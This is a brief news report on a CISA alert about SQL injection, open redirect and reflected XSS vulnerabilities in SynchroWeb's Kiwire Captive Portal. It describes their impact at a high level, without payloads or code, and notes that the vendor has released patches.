CISA issues alert on Kiwire Captive Portal vulnerabilities and vendor fixes
The Kiwire Captive Portal by SynchroWeb, designed to provide internet access to multiple guest users, has been found to have vulnerabilities including Structured Query Language (SQL) injection, open redirection, and Cross-Site Scripting (XSS) that could be exploited to compromise the device.
These security issues are identified as CVE-2025-11188, CVE-2025-11190, and CVE-2025-11189. The blind SQL injection vulnerability resides in the nas-id parameter permitting the execution of SQL commands to manipulate the backend database. An open redirection flaw exists in the login-url parameter enabling attackers to reroute users to potentially harmful websites. Additionally, the login-url parameter also suffers from a reflected XSS vulnerability that allows execution of JavaScript code when a specially crafted URL is accessed. These vulnerabilities were present in specific firmware or software versions of the Kiwire Captive Portal and the advisory highlights their separate mechanisms of exploitation.
As a result of these vulnerabilities, attackers can retrieve sensitive information from the Kiwire Captive Portal database, reroute users attempting to log in to attacker-controlled websites, and execute JavaScript on devices seeking internet access through the captive portal. It is noted that the domains involved in the XSS and open redirection vulnerabilities are locally trusted on most client devices, relating to their role in initial access prior to internet connectivity.
To address these security concerns, the vendor has released updates resolving the identified vulnerabilities. SynchroWeb has provided a security advisory on their website and will directly communicate with users of affected versions to facilitate the update and patching process.
The advisory includes recognition of individuals who reported these vulnerabilities and maintains a record of technical details and reference materials. The guidance urges users of the Kiwire Captive Portal to apply the vendor-provided patches to mitigate these risks.